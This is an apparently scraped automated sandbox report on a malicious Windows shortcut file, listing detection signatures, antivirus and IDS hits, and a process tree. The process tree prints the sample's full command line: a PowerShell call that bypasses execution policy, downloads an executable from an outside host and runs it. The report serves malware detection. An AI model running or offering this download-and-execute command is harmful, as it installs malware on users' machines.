Edit tour
Windows
Analysis Report
Document.doc.lnk
Overview
General Information
Detection
MalLnk
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Found URL in windows shortcut file (LNK)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- cmd.exe (PID: 4432 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe Ex ecutionPol icy Bypass (New-Obje ct System. Net.WebCli ent).Downl oadFile('h ttp://twiz t.net/spl. exe','C:\U sers\user\ windrv.exe ');Start-P rocess 'C: \Users\use r\windrv.e xe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5324 cmdline:
powershell .exe Execu tionPolicy Bypass (N ew-Object System.Net .WebClient ).Download File('http ://twizt.n et/spl.exe ','C:\User s\user\win drv.exe'); Start-Proc ess 'C:\Us ers\user\w indrv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - windrv.exe (PID: 1288 cmdline:
"C:\Users\ user\windr v.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D) - winsvc.exe (PID: 5284 cmdline:
C:\Users\u ser\winsvc .exe MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- winsvc.exe (PID: 1292 cmdline:
"C:\Users\ user\winsv c.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- winsvc.exe (PID: 5252 cmdline:
"C:\Users\ user\winsv c.exe" MD5: 3CB61CE448A806E79CE88D06E992CC9D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp: | 03/28/24-10:33:03.840918 |
SID: | 2853272 |
Source Port: | 80 |
Destination Port: | 49706 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 03/28/24-10:33:03.598146 |
SID: | 2019714 |
Source Port: | 49706 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | HTTP traffic detected: |